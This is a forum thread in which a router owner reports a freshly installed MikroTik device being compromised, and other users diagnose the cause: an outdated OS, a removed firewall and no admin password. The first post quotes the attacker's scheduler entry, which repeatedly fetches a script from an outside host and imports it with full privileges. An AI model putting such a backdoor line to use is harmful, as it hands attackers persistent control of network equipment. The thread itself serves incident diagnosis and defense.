MikroTik

Community discussions
https://forum.mikrotik.com/

Routerboard Hacked question

https://forum.mikrotik.com/viewtopic.php?t=142689

Page 1 of 1

Routerboard Hacked question

Posted: Wed Dec 12, 2018 3:06 pm
by sewlist
Hi Guys

My installer installed a new router, and 5mins later before we could upgrade it was hacked

Only thing we saw that was changed was this scheduler added

Does anyone know what this mean

0 X name="U6" start-time=startup interval=15s on-event=/tool fetch url=http://fanmusic.xyz/poll/25e93549-c1a1- ... 05bb514ab6 mode=http dst-path=7wmp0b4swouv\r\n/import 7wmp0b4swouv owner="admin" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive run-count=0



S

Re: Routerboard Hacked question

Posted: Wed Dec 12, 2018 3:08 pm
by normis
why don't you check the contents of that new file, that this scheduler downloaded ? it's in the files section now.

I suggest Netinstalling the device, and never give access to your device from the internet, where is your firewall ?

Re: Routerboard Hacked question

Posted: Wed Dec 12, 2018 3:09 pm
by mistry7
Forgot to set Admin pass ???
Use newest ROS!

Re: Routerboard Hacked question

Posted: Wed Dec 12, 2018 3:12 pm
by sewlist
Agree with all of you, Rookie error from my teams

We will reinstall router clean

S

Re: Routerboard Hacked question

Posted: Wed Dec 12, 2018 3:13 pm
by normis
Yes.

1. Used old RouterOS
2. Removed the default firewall
3. Forgot to set password
4. Connnected it to the internet without any firewall

No need to hack anything, just begging for trouble.
All times are UTC+02:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/